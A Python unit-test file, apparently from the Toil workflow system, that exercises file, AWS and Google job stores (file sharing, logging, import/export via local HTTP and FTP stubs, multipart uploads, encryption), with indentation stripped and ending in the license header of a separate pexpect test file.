def testSharedFiles(self):
"""Tests the sharing of files."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
bar = 'bar'
if sys.version_info >= (3, 0):
bar = b'bar'
with jobstore1.writeSharedFileStream('foo') as f:
f.write(bar)
# ... read that file on worker, ...
with jobstore2.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
# ... and read it again on jobstore1.
with jobstore1.readSharedFileStream('foo') as f:
self.assertEqual(bar, f.read())
with jobstore1.writeSharedFileStream('nonEncrypted', isProtected=False) as f:
f.write(bar)
self.assertUrl(jobstore1.getSharedPublicUrl('nonEncrypted'))
self.assertRaises(NoSuchFileException, jobstore1.getSharedPublicUrl, 'missing')
@travis_test
def testPerJobFiles(self):
"""Tests the behavior of files on jobs."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
# Create jobNodeOnJS1
jobOnJobStore1 = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1')
# First recreate job
jobstore1.assignID(jobOnJobStore1)
jobstore1.create(jobOnJobStore1)
fileOne = jobstore2.getEmptyFileStoreID(jobOnJobStore1.jobStoreID, cleanup=True)
# Check file exists
self.assertTrue(jobstore2.fileExists(fileOne))
self.assertTrue(jobstore1.fileExists(fileOne))
one = 'one'
two = 'two'
three = 'three'
if sys.version_info >= (3, 0):
one = b'one'
two = b'two'
three = b'three'
# ... write to the file on jobstore2, ...
with jobstore2.updateFileStream(fileOne) as f:
f.write(one)
# ... read the file as a stream on the jobstore1, ....
with jobstore1.readFileStream(fileOne) as f:
self.assertEqual(f.read(), one)
# ... and copy it to a temporary physical file on the jobstore1.
fh, path = tempfile.mkstemp()
try:
os.close(fh)
tmpPath = path + '.read-only'
jobstore1.readFile(fileOne, tmpPath)
try:
shutil.copyfile(tmpPath, path)
finally:
os.unlink(tmpPath)
with open(path, 'rb+') as f:
self.assertEqual(f.read(), one)
# Write a different string to the local file ...
f.seek(0)
f.truncate(0)
f.write(two)
# ... and create a second file from the local file.
fileTwo = jobstore1.writeFile(path, jobOnJobStore1.jobStoreID, cleanup=True)
with jobstore2.readFileStream(fileTwo) as f:
self.assertEqual(f.read(), two)
# Now update the first file from the local file ...
jobstore1.updateFile(fileOne, path)
with jobstore2.readFileStream(fileOne) as f:
self.assertEqual(f.read(), two)
finally:
os.unlink(path)
# Create a third file to test the last remaining method.
with jobstore2.writeFileStream(jobOnJobStore1.jobStoreID, cleanup=True) as (f, fileThree):
f.write(three)
with jobstore1.readFileStream(fileThree) as f:
self.assertEqual(f.read(), three)
# Delete a file explicitly but leave files for the implicit deletion through the parent
jobstore2.deleteFile(fileOne)
# Check the file is gone
#
for store in jobstore2, jobstore1:
self.assertFalse(store.fileExists(fileOne))
self.assertRaises(NoSuchFileException, store.readFile, fileOne, '')
try:
with store.readFileStream(fileOne) as _:
pass
self.fail('Expecting NoSuchFileException')
except NoSuchFileException:
pass
@travis_test
def testStatsAndLogging(self):
"""Tests behavior of reading and writting stats and logging."""
jobstore1 = self.jobstore_initialized
jobstore2 = self.jobstore_resumed_noconfig
jobOnJobStore1 = JobDescription(command='job1',
requirements=self.parentJobReqs,
jobName='test1', unitName='onJobStore1')
jobstore1.assignID(jobOnJobStore1)
jobstore1.create(jobOnJobStore1)
# Test stats and logging
stats = None
one = b'one'
two = b'two'
            # Callback that collects the entries handed back by readStatsAndLogging.
def callback(f2):
stats.add(f2.read())
# Collects stats and logging messages.
stats = set()
# No stats or logging added yet. Expect nothing.
self.assertEqual(0, jobstore1.readStatsAndLogging(callback))
self.assertEqual(set(), stats)
# Test writing and reading.
jobstore2.writeStatsAndLogging(one)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one}, stats)
self.assertEqual(0, jobstore1.readStatsAndLogging(callback)) # readStatsAndLogging purges saved stats etc
jobstore2.writeStatsAndLogging(one)
jobstore2.writeStatsAndLogging(two)
stats = set()
self.assertEqual(2, jobstore1.readStatsAndLogging(callback))
self.assertEqual({one, two}, stats)
largeLogEntry = os.urandom(self._largeLogEntrySize())
stats = set()
jobstore2.writeStatsAndLogging(largeLogEntry)
self.assertEqual(1, jobstore1.readStatsAndLogging(callback))
self.assertEqual({largeLogEntry}, stats)
# test the readAll parameter
self.assertEqual(4, jobstore1.readStatsAndLogging(callback, readAll=True))
# Delete parent
jobstore1.delete(jobOnJobStore1.jobStoreID)
self.assertFalse(jobstore1.exists(jobOnJobStore1.jobStoreID))
# TODO: Who deletes the shared files?
@travis_test
def testWriteLogFiles(self):
"""Test writing log files."""
jobNames = ['testStatsAndLogging_writeLogFiles']
jobLogList = ['string', b'bytes', '', b'newline\n']
config = self._createConfig()
setattr(config, 'writeLogs', '.')
setattr(config, 'writeLogsGzip', None)
StatsAndLogging.writeLogFiles(jobNames, jobLogList, config)
jobLogFile = os.path.join(config.writeLogs, jobNames[0] + '000.log')
self.assertTrue(os.path.isfile(jobLogFile))
with open(jobLogFile, 'r') as f:
self.assertEqual(f.read(), 'string\nbytes\n\nnewline\n')
os.remove(jobLogFile)
@travis_test
def testBatchCreate(self):
"""Test creation of many jobs."""
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
jobs = []
with jobstore.batch():
for i in range(100):
overlargeJob = JobDescription(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore')
jobstore.assignID(overlargeJob)
jobstore.create(overlargeJob)
jobs.append(overlargeJob)
for job in jobs:
self.assertTrue(jobstore.exists(job.jobStoreID))
@travis_test
def testGrowingAndShrinkingJob(self):
"""Make sure jobs update correctly if they grow/shrink."""
# Make some very large data, large enough to trigger
# overlarge job creation if that's a thing
# (i.e. AWSJobStore)
arbitraryLargeData = os.urandom(500000)
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
# Make the job grow
job.foo_attribute = arbitraryLargeData
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, arbitraryLargeData)
# Make the job shrink back close to its original size
job.foo_attribute = None
self.jobstore_initialized.update(job)
check_job = self.jobstore_initialized.load(job.jobStoreID)
self.assertEqual(check_job.foo_attribute, None)
def _prepareTestFile(self, store, size=None):
"""
Generates a URL that can be used to point at a test file in the storage mechanism
used by the job store under test by this class. Optionally creates a file at that URL.
:param: store: an object referencing the store, same type as _createExternalStore's
return value
:param int size: The size of the test file to be created.
:return: the URL, or a tuple (url, md5) where md5 is the file's hexadecimal MD5 digest
:rtype: str|(str,str)
"""
raise NotImplementedError()
@abstractmethod
def _hashTestFile(self, url):
"""
Returns hexadecimal MD5 digest of the contents of the file pointed at by the URL.
"""
raise NotImplementedError()
@abstractmethod
def _createExternalStore(self):
raise NotImplementedError()
@abstractmethod
def _cleanUpExternalStore(self, store):
"""
:param: store: an object referencing the store, same type as _createExternalStore's
return value
"""
raise NotImplementedError()
externalStoreCache = {}
def _externalStore(self):
try:
store = self.externalStoreCache[self]
except KeyError:
logger.debug('Creating new external store for %s', self)
store = self.externalStoreCache[self] = self._createExternalStore()
else:
logger.debug('Reusing external store for %s', self)
return store
@classmethod
def cleanUpExternalStores(cls):
for test, store in iteritems(cls.externalStoreCache):
logger.debug('Cleaning up external store for %s.', test)
test._cleanUpExternalStore(store)
mpTestPartSize = 5 << 20
@classmethod
def makeImportExportTests(cls):
testClasses = [FileJobStoreTest, AWSJobStoreTest, GoogleJobStoreTest]
activeTestClassesByName = {testCls.__name__: testCls
for testCls in testClasses
if not getattr(testCls, '__unittest_skip__', False)}
def testImportExportFile(self, otherCls, size, moveExports):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
:param int size: the size of the file to test importing/exporting with
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
self.jobstore_initialized.moveExports = moveExports
# The string in otherCls() is arbitrary as long as it returns a class that has access
# to ._externalStore() and ._prepareTestFile()
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, size)
# Import into job store under test
jobStoreFileID = self.jobstore_initialized.importFile(srcUrl)
self.assertTrue(isinstance(jobStoreFileID, FileID))
with self.jobstore_initialized.readFileStream(jobStoreFileID) as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
# Export back into other job store
dstUrl = other._prepareTestFile(store)
self.jobstore_initialized.exportFile(jobStoreFileID, dstUrl)
self.assertEqual(fileMD5, other._hashTestFile(dstUrl))
if otherCls.__name__ == 'FileJobStoreTest':
if isinstance(self.jobstore_initialized, FileJobStore):
jobStorePath = self.jobstore_initialized._getFilePathFromId(jobStoreFileID)
jobStoreHasLink = os.path.islink(jobStorePath)
if self.jobstore_initialized.moveExports:
# Ensure the export performed a move / link
self.assertTrue(jobStoreHasLink)
self.assertEqual(os.path.realpath(jobStorePath), dstUrl[7:])
else:
# Ensure the export has not moved the job store file
self.assertFalse(jobStoreHasLink)
# Remove local Files
os.remove(srcUrl[7:])
os.remove(dstUrl[7:])
make_tests(testImportExportFile, cls, otherCls=activeTestClassesByName,
size=dict(zero=0,
one=1,
oneMiB=2 ** 20,
partSizeMinusOne=cls.mpTestPartSize - 1,
partSize=cls.mpTestPartSize,
partSizePlusOne=cls.mpTestPartSize + 1),
moveExports={'deactivated': None, 'activated': True})
def testImportSharedFile(self, otherCls):
"""
:param AbstractJobStoreTest.Test self: the current test case
:param AbstractJobStoreTest.Test otherCls: the test case class for the job store
to import from or export to
"""
# Prepare test file in other job store
self.jobstore_initialized.partSize = cls.mpTestPartSize
other = otherCls('testSharedFiles')
store = other._externalStore()
srcUrl, srcMd5 = other._prepareTestFile(store, 42)
# Import into job store under test
self.assertIsNone(self.jobstore_initialized.importFile(srcUrl, sharedFileName='foo'))
with self.jobstore_initialized.readSharedFileStream('foo') as f:
fileMD5 = hashlib.md5(f.read()).hexdigest()
self.assertEqual(fileMD5, srcMd5)
if otherCls.__name__ == 'FileJobStoreTest': # Remove local Files
os.remove(srcUrl[7:])
make_tests(testImportSharedFile,
cls,
otherCls=activeTestClassesByName)
@travis_test
def testImportHttpFile(self):
'''Test importing a file over HTTP.'''
http = socketserver.TCPServer(('', 0), StubHttpRequestHandler)
try:
httpThread = threading.Thread(target=http.serve_forever)
httpThread.start()
try:
assignedPort = http.server_address[1]
url = 'http://localhost:%d' % assignedPort
with self.jobstore_initialized.readFileStream(
self.jobstore_initialized.importFile(url)) as readable:
f1 = readable.read()
f2 = StubHttpRequestHandler.fileContents
if isinstance(f1, bytes) and not isinstance(f2, bytes):
f1 = f1.decode()
if isinstance(f2, bytes) and not isinstance(f1, bytes):
f1 = f1.encode()
self.assertEqual(f1, f2)
finally:
http.shutdown()
httpThread.join()
finally:
http.server_close()
@travis_test
def testImportFtpFile(self):
'''Test importing a file over FTP'''
ftpfile = {'name': 'foo', 'content': 'foo bar baz qux'}
ftp = FTPStubServer(0)
ftp.run()
try:
ftp.add_file(**ftpfile)
assignedPort = ftp.server.server_address[1]
url = 'ftp://user1:passwd@localhost:%d/%s' % (assignedPort, ftpfile['name'])
with self.jobstore_initialized.readFileStream(self.jobstore_initialized.importFile(url)) as readable:
imported_content = readable.read()
# python 2/3 string/bytestring compat
if isinstance(imported_content, bytes):
imported_content = imported_content.decode('utf-8')
self.assertEqual(imported_content, ftpfile['content'])
finally:
ftp.stop()
@slow
def testFileDeletion(self):
"""
Intended to cover the batch deletion of items in the AWSJobStore, but it doesn't hurt
running it on the other job stores.
"""
n = self._batchDeletionSize()
for numFiles in (1, n - 1, n, n + 1, 2 * n):
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
fileIDs = [self.jobstore_initialized.getEmptyFileStoreID(job.jobStoreID, cleanup=True) for _ in
range(0, numFiles)]
self.jobstore_initialized.delete(job.jobStoreID)
for fileID in fileIDs:
# NB: the fooStream() methods return context managers
self.assertRaises(NoSuchFileException, self.jobstore_initialized.readFileStream(fileID).__enter__)
@slow
def testMultipartUploads(self):
"""
This test is meant to cover multi-part uploads in the AWSJobStore but it doesn't hurt
running it against the other job stores as well.
"""
# http://unix.stackexchange.com/questions/11946/how-big-is-the-pipe-buffer
bufSize = 65536
partSize = self._partSize()
self.assertEqual(partSize % bufSize, 0)
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
# Test file/stream ending on part boundary and within a part
for partsPerFile in (1, 2.33):
checksum = hashlib.md5()
checksumQueue = Queue(2)
# FIXME: Having a separate thread is probably overkill here
def checksumThreadFn():
while True:
_buf = checksumQueue.get()
if _buf is None:
break
checksum.update(_buf)
# Multipart upload from stream
checksumThread = Thread(target=checksumThreadFn)
checksumThread.start()
try:
# Should not block. On Linux, /dev/random blocks when it's running low on entropy
with open('/dev/urandom', 'rb') as readable:
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (
writable, fileId):
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
checksumQueue.put(buf)
writable.write(buf)
finally:
checksumQueue.put(None)
checksumThread.join()
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
# Multi-part upload from file
checksum = hashlib.md5()
fh, path = tempfile.mkstemp()
try:
with os.fdopen(fh, 'wb+') as writable:
with open('/dev/urandom', 'rb') as readable:
for i in range(int(partSize * partsPerFile / bufSize)):
buf = readable.read(bufSize)
writable.write(buf)
checksum.update(buf)
fileId = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
finally:
os.unlink(path)
before = checksum.hexdigest()
# Verify
checksum = hashlib.md5()
with self.jobstore_initialized.readFileStream(fileId) as readable:
while True:
buf = readable.read(bufSize)
if not buf:
break
checksum.update(buf)
after = checksum.hexdigest()
self.assertEqual(before, after)
self.jobstore_initialized.delete(job.jobStoreID)
@travis_test
def testZeroLengthFiles(self):
'''Test reading and writing of empty files.'''
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
nullFile = self.jobstore_initialized.writeFile('/dev/null', job.jobStoreID, cleanup=True)
with self.jobstore_initialized.readFileStream(nullFile) as f:
assert not f.read()
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, nullStream):
pass
with self.jobstore_initialized.readFileStream(nullStream) as f:
assert not f.read()
self.jobstore_initialized.delete(job.jobStoreID)
@slow
def testLargeFile(self):
'''Test the reading and writing of large files.'''
# Write a large file.
dirPath = self._createTempDir()
filePath = os.path.join(dirPath, 'large')
hashIn = hashlib.md5()
with open(filePath, 'wb') as f:
for i in range(0, 10):
buf = os.urandom(self._partSize())
f.write(buf)
hashIn.update(buf)
# Load the file into a jobstore.
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
jobStoreFileID = self.jobstore_initialized.writeFile(filePath, job.jobStoreID, cleanup=True)
# Remove the local file.
os.unlink(filePath)
# Write a local copy of the file from the jobstore.
self.jobstore_initialized.readFile(jobStoreFileID, filePath)
# Reread the file to confirm success.
hashOut = hashlib.md5()
with open(filePath, 'rb') as f:
while True:
buf = f.read(self._partSize())
if not buf:
break
hashOut.update(buf)
self.assertEqual(hashIn.digest(), hashOut.digest())
def assertUrl(self, url):
prefix, path = url.split(':', 1)
if prefix == 'file':
self.assertTrue(os.path.exists(path))
else:
try:
urlopen(Request(url))
except:
self.fail()
@slow
def testCleanCache(self):
# Make a bunch of jobs
jobstore = self.jobstore_initialized
# Create parent job
rootJob = self.arbitraryJob()
self.jobstore_initialized.assignID(rootJob)
self.jobstore_initialized.create(rootJob)
# Create a bunch of child jobs
for i in range(100):
child = self.arbitraryJob()
self.jobstore_initialized.assignID(child)
self.jobstore_initialized.create(child)
rootJob.addChild(child.jobStoreID)
jobstore.update(rootJob)
# Make the parent the root
jobstore.setRootJob(rootJob.jobStoreID)
# See how long it takes to clean with no cache
noCacheStart = time.time()
jobstore.clean()
noCacheEnd = time.time()
noCacheTime = noCacheEnd - noCacheStart
# Make sure we have all the jobs: root and children.
self.assertEqual(len(list(jobstore.jobs())), 101)
# See how long it takes to clean with cache
jobCache = {job.jobStoreID: job
for job in jobstore.jobs()}
cacheStart = time.time()
jobstore.clean(jobCache)
cacheEnd = time.time()
cacheTime = cacheEnd - cacheStart
logger.debug("Without cache: %f, with cache: %f.", noCacheTime, cacheTime)
# Running with the cache should be faster.
self.assertTrue(cacheTime <= noCacheTime)
# NB: the 'thread' method seems to be needed here to actually
# ensure the timeout is raised, probably because the only
# "live" thread doesn't hold the GIL.
@travis_test
@pytest.mark.timeout(45, method='thread')
def testPartialReadFromStream(self):
"""Test whether readFileStream will deadlock on a partial read."""
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
with self.jobstore_initialized.writeFileStream(job.jobStoreID, cleanup=True) as (f, fileID):
# Write enough data to make sure the writer thread
# will get blocked on the write. Technically anything
# greater than the pipe buffer size plus the libc
# buffer size (64K + 4K(?)) should trigger this bug,
# but this gives us a lot of extra room just to be sure.
                # python 3 requires the data written here to be a bytestring
a = 'a'
if sys.version_info >= (3, 0):
a = b'a'
f.write(a * 300000)
with self.jobstore_initialized.readFileStream(fileID) as f:
self.assertEqual(f.read(1), a)
# If it times out here, there's a deadlock
@abstractmethod
def _corruptJobStore(self):
"""
Deletes some part of the physical storage represented by a job store.
"""
raise NotImplementedError()
@slow
def testDestructionOfCorruptedJobStore(self):
self._corruptJobStore()
jobstore = self._createJobStore()
jobstore.destroy()
# Note that self.jobstore_initialized.destroy() is done as part of shutdown
@travis_test
def testDestructionIdempotence(self):
# Jobstore is fully initialized
self.jobstore_initialized.destroy()
# Create a second instance for the same physical storage but do not .initialize() or
# .resume() it.
cleaner = self._createJobStore()
cleaner.destroy()
# And repeat
self.jobstore_initialized.destroy()
cleaner = self._createJobStore()
cleaner.destroy()
@travis_test
def testEmptyFileStoreIDIsReadable(self):
"""Simply creates an empty fileStoreID and attempts to read from it."""
id = self.jobstore_initialized.getEmptyFileStoreID()
fh, path = tempfile.mkstemp()
try:
self.jobstore_initialized.readFile(id, path)
self.assertTrue(os.path.isfile(path))
finally:
os.unlink(path)
def _largeLogEntrySize(self):
"""
Sub-classes may want to override these in order to maximize test coverage
"""
return 1 * 1024 * 1024
def _batchDeletionSize(self):
return 10
def _partSize(self):
return 5 * 1024 * 1024
class AbstractEncryptedJobStoreTest(object):
# noinspection PyAbstractClass
class Test(with_metaclass(ABCMeta, AbstractJobStoreTest.Test)):
"""
A test of job stores that use encryption
"""
def setUp(self):
# noinspection PyAttributeOutsideInit
self.sseKeyDir = tempfile.mkdtemp()
super(AbstractEncryptedJobStoreTest.Test, self).setUp()
def tearDown(self):
super(AbstractEncryptedJobStoreTest.Test, self).tearDown()
shutil.rmtree(self.sseKeyDir)
def _createConfig(self):
config = super(AbstractEncryptedJobStoreTest.Test, self)._createConfig()
sseKeyFile = os.path.join(self.sseKeyDir, 'keyFile')
with open(sseKeyFile, 'w') as f:
f.write('01234567890123456789012345678901')
config.sseKey = sseKeyFile
# config.attrib['sse_key'] = sseKeyFile
return config
def testEncrypted(self):
"""
Create an encrypted file. Read it in encrypted mode then try with encryption off
to ensure that it fails.
"""
phrase = 'This file is encrypted.'.encode('utf-8')
fileName = 'foo'
with self.jobstore_initialized.writeSharedFileStream(fileName, isProtected=True) as f:
f.write(phrase)
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
# disable encryption
self.jobstore_initialized.config.sseKey = None
try:
with self.jobstore_initialized.readSharedFileStream(fileName) as f:
self.assertEqual(phrase, f.read())
except AssertionError as e:
self.assertEqual("Content is encrypted but no key was provided.", e.args[0])
else:
self.fail("Read encryption content with encryption off.")
class FileJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
# Make a FileJobStore with an artificially low fan out threshold, to
# make sure to test fan out logic
return FileJobStore(self.namePrefix, fanOut=2)
def _corruptJobStore(self):
assert isinstance(self.jobstore_initialized, FileJobStore) # type hint
shutil.rmtree(self.jobstore_initialized.jobStoreDir)
def _prepareTestFile(self, dirPath, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
localFilePath = dirPath + fileName
url = 'file://%s' % localFilePath
if size is None:
return url
else:
content = os.urandom(size)
with open(localFilePath, 'wb') as writable:
writable.write(content)
return url, hashlib.md5(content).hexdigest()
def _hashTestFile(self, url):
localFilePath = FileJobStore._extractPathFromUrl(urlparse.urlparse(url))
with open(localFilePath, 'rb') as f:
return hashlib.md5(f.read()).hexdigest()
def _createExternalStore(self):
return tempfile.mkdtemp()
def _cleanUpExternalStore(self, dirPath):
shutil.rmtree(dirPath)
@travis_test
def testPreserveFileName(self):
"Check that the fileID ends with the given file name."
fh, path = tempfile.mkstemp()
try:
os.close(fh)
job = self.arbitraryJob()
self.jobstore_initialized.assignID(job)
self.jobstore_initialized.create(job)
fileID = self.jobstore_initialized.writeFile(path, job.jobStoreID, cleanup=True)
self.assertTrue(fileID.endswith(os.path.basename(path)))
finally:
os.unlink(path)
@needs_google
class GoogleJobStoreTest(AbstractJobStoreTest.Test):
projectID = os.getenv('TOIL_GOOGLE_PROJECTID')
headers = {"x-goog-project-id": projectID}
def _createJobStore(self):
from toil.jobStores.googleJobStore import GoogleJobStore
return GoogleJobStore(GoogleJobStoreTest.projectID + ":" + self.namePrefix)
def _corruptJobStore(self):
# The Google job store has only one resource, the bucket, so we can't corrupt it without
# fully deleting it.
pass
def _prepareTestFile(self, bucket, size=None):
from toil.jobStores.googleJobStore import GoogleJobStore
fileName = 'testfile_%s' % uuid.uuid4()
url = 'gs://%s/%s' % (bucket.name, fileName)
if size is None:
return url
with open('/dev/urandom', 'rb') as readable:
contents = str(readable.read(size))
GoogleJobStore._writeToUrl(StringIO(contents), urlparse.urlparse(url))
return url, hashlib.md5(contents).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.googleJobStore import GoogleJobStore
contents = GoogleJobStore._getBlobFromURL(urlparse.urlparse(url)).download_as_string()
return hashlib.md5(contents).hexdigest()
@googleRetry
def _createExternalStore(self):
from google.cloud import storage
bucketName = ("import-export-test-" + str(uuid.uuid4()))
storageClient = storage.Client()
return storageClient.create_bucket(bucketName)
@googleRetry
def _cleanUpExternalStore(self, bucket):
# this is copied from googleJobStore.destroy
try:
bucket.delete(force=True)
# throws ValueError if bucket has more than 256 objects. Then we must delete manually
except ValueError:
bucket.delete_blobs(bucket.list_blobs())
bucket.delete()
@needs_aws_s3
class AWSJobStoreTest(AbstractJobStoreTest.Test):
def _createJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
partSize = self._partSize()
return AWSJobStore(self.awsRegion() + ':' + self.namePrefix, partSize=partSize)
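# Destroying the live job store tears down both its SDB domains and its bucket, which is
# the closest we can get to "corrupting" an AWS job store; the base-class
# testDestructionOfCorruptedJobStore then checks that destroy() on a fresh handle still succeeds.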
def _corruptJobStore(self):
from toil.jobStores.aws.jobStore import AWSJobStore
assert isinstance(self.jobstore_initialized, AWSJobStore) # type hinting
self.jobstore_initialized.destroy()
def testSDBDomainsDeletedOnFailedJobstoreBucketCreation(self):
"""
This test ensures that SDB domains bound to a jobstore are deleted if the jobstore bucket
failed to be created. We simulate a failed jobstore bucket creation by using a bucket in a
different region with the same name.
"""
from boto.sdb import connect_to_region
from boto.s3.connection import Location, S3Connection
from boto.exception import S3ResponseError
from toil.jobStores.aws.jobStore import BucketLocationConflictException
from toil.jobStores.aws.utils import retry_s3
externalAWSLocation = Location.USWest
for testRegion in 'us-east-1', 'us-west-2':
# We run this test twice, once with the default s3 server us-east-1 as the test region
# and once with another server (us-west-2). The external server is always us-west-1.
# This incidentally tests that the BucketLocationConflictException is thrown when using
# both the default and a non-default server.
testJobStoreUUID = str(uuid.uuid4())
# Create the bucket at the external region
s3 = S3Connection()
for attempt in retry_s3(delays=(2, 5, 10, 30, 60), timeout=600):
with attempt:
bucket = s3.create_bucket('domain-test-' + testJobStoreUUID + '--files',
location=externalAWSLocation)
options = Job.Runner.getDefaultOptions('aws:' + testRegion + ':domain-test-' +
testJobStoreUUID)
options.logLevel = 'DEBUG'
try:
with Toil(options) as toil:
pass
except BucketLocationConflictException:
# Catch the expected BucketLocationConflictException and ensure that the bound
# domains don't exist in SDB.
sdb = connect_to_region(self.awsRegion())
next_token = None
allDomainNames = []
while True:
domains = sdb.get_all_domains(max_domains=100, next_token=next_token)
allDomainNames.extend([x.name for x in domains])
next_token = domains.next_token
if next_token is None:
break
self.assertFalse([d for d in allDomainNames if testJobStoreUUID in d])
else:
self.fail()
finally:
try:
for attempt in retry_s3():
with attempt:
s3.delete_bucket(bucket=bucket)
except S3ResponseError as e:
# The actual HTTP code of the error is in status.
# See https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L77-L80
# See also: https://github.com/boto/boto/blob/91ba037e54ef521c379263b0ac769c66182527d7/boto/exception.py#L154-L156
if e.status == 404:
# The bucket doesn't exist; maybe a failed delete actually succeeded.
pass
else:
raise
@slow
def testInlinedFiles(self):
from toil.jobStores.aws.jobStore import AWSJobStore
jobstore = self.jobstore_initialized
for encrypted in (True, False):
n = AWSJobStore.FileInfo.maxInlinedSize()
sizes = (1, old_div(n, 2), n - 1, n, n + 1, 2 * n)
for size in chain(sizes, islice(reversed(sizes), 1)):
s = os.urandom(size)
with jobstore.writeSharedFileStream('foo') as f:
f.write(s)
with jobstore.readSharedFileStream('foo') as f:
self.assertEqual(s, f.read())
def testOverlargeJob(self):
jobstore = self.jobstore_initialized
jobRequirements = dict(memory=12, cores=34, disk=35, preemptable=True)
overlargeJob = JobDescription(command='overlarge',
requirements=jobRequirements,
jobName='test-overlarge', unitName='onJobStore')
# Make the pickled size of the job larger than 256K
with open("/dev/urandom", 'rb') as random:
overlargeJob.jobName = str(random.read(512 * 1024))
jobstore.assignID(overlargeJob)
jobstore.create(overlargeJob)
self.assertTrue(jobstore.exists(overlargeJob.jobStoreID))
overlargeJobDownloaded = jobstore.load(overlargeJob.jobStoreID)
# Because jobs lack equality comparison, we stringify for comparison.
jobsInJobStore = [str(job) for job in jobstore.jobs()]
self.assertEqual(jobsInJobStore, [str(overlargeJob)])
jobstore.delete(overlargeJob.jobStoreID)
def _prepareTestFile(self, bucket, size=None):
fileName = 'testfile_%s' % uuid.uuid4()
url = 's3://%s/%s' % (bucket.name, fileName)
if size is None:
return url
with open('/dev/urandom', 'rb') as readable:
bucket.new_key(fileName).set_contents_from_string(str(readable.read(size)))
return url, hashlib.md5(bucket.get_key(fileName).get_contents_as_string()).hexdigest()
def _hashTestFile(self, url):
from toil.jobStores.aws.jobStore import AWSJobStore
key = AWSJobStore._getKeyForUrl(urlparse.urlparse(url), existing=True)
try:
contents = key.get_contents_as_string()
finally:
key.bucket.connection.close()
return hashlib.md5(contents).hexdigest()
def _createExternalStore(self):
import boto.s3
from toil.jobStores.aws.utils import region_to_bucket_location
s3 = boto.s3.connect_to_region(self.awsRegion())
try:
return s3.create_bucket(bucket_name='import-export-test-%s' % uuid.uuid4(),
location=region_to_bucket_location(self.awsRegion()))
except:
with panic(log=logger):
s3.close()
def _cleanUpExternalStore(self, bucket):
try:
for key in bucket.list():
key.delete()
bucket.delete()
finally:
bucket.connection.close()
def _largeLogEntrySize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
# So we get into the else branch of reader() in uploadStream(multiPart=False):
return AWSJobStore.FileInfo.maxBinarySize() * 2
def _batchDeletionSize(self):
from toil.jobStores.aws.jobStore import AWSJobStore
return AWSJobStore.itemsPerBatchDelete
@needs_aws_s3
class InvalidAWSJobStoreTest(ToilTest):
def testInvalidJobStoreName(self):
from toil.jobStores.aws.jobStore import AWSJobStore
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a--b')
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:' + ('a' * 100))
self.assertRaises(ValueError,
AWSJobStore,
'us-west-2:a_b')
@needs_aws_s3
@needs_encryption
@slow
class EncryptedAWSJobStoreTest(AWSJobStoreTest, AbstractEncryptedJobStoreTest.Test):
pass
class StubHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
fileContents = 'A good programmer looks both ways before crossing a one-way street'
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", len(self.fileContents))
self.end_headers()
# python 3 requires self.fileContents to be a bytestring
if sys.version_info >= (3, 0):
self.fileContents = self.fileContents.encode('utf-8')
self.wfile.write(self.fileContents)
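# Generate the import/export test methods on the abstract Test class; the concrete
# job store test classes above then inherit them.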
AbstractJobStoreTest.Test.makeImportExportTests()
test_socket.py
#!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <noah@noah.org>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
